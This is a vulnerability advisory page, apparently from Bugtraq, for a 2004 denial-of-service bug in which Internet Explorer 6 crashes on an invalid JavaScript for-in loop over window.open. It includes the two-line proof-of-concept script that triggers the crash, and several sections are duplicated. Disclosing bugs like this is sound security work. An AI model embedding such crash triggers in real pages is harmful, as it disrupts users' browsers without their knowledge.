Microsoft Internet Explorer JavaScript Null Pointer Exception Denial Of Service Vulnerability
BID:10694
Info
Microsoft Internet Explorer JavaScript Null Pointer Exception Denial Of Service Vulnerability
| Bugtraq ID: | 10694 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 12 2004 12:00AM |
| Updated: | Jul 12 2004 12:00AM |
| Credit: | Discovery of this vulnerability is credited to "Berend-Jan Wever" <[email protected]>. |
| Vulnerable: |
Microsoft Internet Explorer 6.0 SP1 Microsoft Internet Explorer 6.0 |
| Not Vulnerable: | |
Discussion
Microsoft Internet Explorer JavaScript Null Pointer Exception Denial Of Service Vulnerability
A denial of service vulnerability is reported to affect Internet Explorer. The issue is reported to present itself when Internet Explorer attempts to render JavaScript that contains an invalid for statement.
A remote attacker may exploit this vulnerability to cause the running instance of Internet Explorer to crash.
This vulnerability is reported to affect Internet Explorer version 6.0 (SP1), other versions might also be affected.
A denial of service vulnerability is reported to affect Internet Explorer. The issue is reported to present itself when Internet Explorer attempts to render JavaScript that contains an invalid for statement.
A remote attacker may exploit this vulnerability to cause the running instance of Internet Explorer to crash.
This vulnerability is reported to affect Internet Explorer version 6.0 (SP1), other versions might also be affected.
Exploit / POC
Microsoft Internet Explorer JavaScript Null Pointer Exception Denial Of Service Vulnerability
The following proof of concept is available:
<SCRIPT language="javascript">
MSIE = window.open; // for hackers to come in
for (every_bug_found in MSIE) { /* there are zillions more hiden */ }
</SCRIPT>
The following proof of concept is available:
<SCRIPT language="javascript">
MSIE = window.open; // for hackers to come in
for (every_bug_found in MSIE) { /* there are zillions more hiden */ }
</SCRIPT>
Solution / Fix
Microsoft Internet Explorer JavaScript Null Pointer Exception Denial Of Service Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Microsoft Internet Explorer JavaScript Null Pointer Exception Denial Of Service Vulnerability
References:
References:
- I small poem in JScript ("Berend-Jan Wever"
)